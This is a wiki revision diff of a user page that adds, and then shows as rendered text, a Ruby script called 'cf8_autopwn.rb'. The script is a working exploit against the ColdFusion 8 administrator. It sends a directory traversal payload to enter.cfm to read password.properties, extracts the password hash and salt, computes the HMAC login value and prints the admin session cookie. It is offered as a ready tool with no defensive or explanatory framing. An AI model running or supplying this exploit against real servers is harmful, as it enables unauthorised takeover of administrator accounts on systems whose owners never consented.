Difference between revisions of "User:Pseudo"
(creating blank user page) |
|||
| Line 1: | Line 1: | ||
| | ||
| + | #!/usr/bin/ruby | ||
| + | |||
| + | require 'net/http' | ||
| + | require 'net/https' | ||
| + | require 'openssl' | ||
| + | |||
| + | def usage | ||
| + | puts "usage: ./cf8_autopwn.rb host port" | ||
| + | end | ||
| + | |||
| + | if not ARGV.length == 2 | ||
| + | usage | ||
| + | exit(1) | ||
| + | end | ||
| + | |||
| + | server = ARGV[0] | ||
| + | port = ARGV[1].to_i | ||
| + | |||
| + | http = Net::HTTP.new(server, port) | ||
| + | if port == 443 then http.use_ssl = true end | ||
| + | |||
| + | # replace local with text file containing drtrv strings | ||
| + | # or ill stop being lazy and rewrite this to iterate through all options | ||
| + | # until we get a hit | ||
| + | path = '/CFIDE/administrator/enter.cfm' | ||
| + | locale = 'locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en' | ||
| + | headers = { | ||
| + | 'Host' => server, | ||
| + | 'Content-Type' => 'application/x-www-form-urlencoded', | ||
| + | 'Content-Length' => locale.length.to_s, | ||
| + | } | ||
| + | |||
| + | resp, data = http.post(path, locale, headers) | ||
| + | data =~ /\<title\>.*password=([A-F0-9]+).*\<\/title\>/m | ||
| + | password = $1 | ||
| + | data =~ /\<input name="salt" type="hidden" value="(\d+)"\>/ | ||
| + | |||
| + | salt = $1 | ||
| + | hash = OpenSSL::HMAC.hexdigest('sha1',salt, password) | ||
| + | |||
| + | logindata = "cfadminPassword=#{hash.upcase}&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F" | ||
| + | logindata += "&salt=#{salt}&submit=Login" | ||
| + | loginheaders = { | ||
| + | 'Host' => server, | ||
| + | } | ||
| + | |||
| + | resp, data = http.post(path, logindata, loginheaders) | ||
| + | puts resp['set-cookie'] | ||
Revision as of 16:53, 22 September 2012
- !/usr/bin/ruby
require 'net/http' require 'net/https' require 'openssl'
def usage
puts "usage: ./cf8_autopwn.rb host port"
end
if not ARGV.length == 2
usage exit(1)
end
server = ARGV[0] port = ARGV[1].to_i
http = Net::HTTP.new(server, port) if port == 443 then http.use_ssl = true end
- replace local with text file containing drtrv strings
- or ill stop being lazy and rewrite this to iterate through all options
- until we get a hit
path = '/CFIDE/administrator/enter.cfm' locale = 'locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en' headers = {
'Host' => server, 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => locale.length.to_s,
}
resp, data = http.post(path, locale, headers) data =~ /\<title\>.*password=([A-F0-9]+).*\<\/title\>/m password = $1 data =~ /\<input name="salt" type="hidden" value="(\d+)"\>/
salt = $1 hash = OpenSSL::HMAC.hexdigest('sha1',salt, password)
logindata = "cfadminPassword=#{hash.upcase}&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F" logindata += "&salt=#{salt}&submit=Login" loginheaders = {
'Host' => server,
}
resp, data = http.post(path, logindata, loginheaders) puts resp['set-cookie']
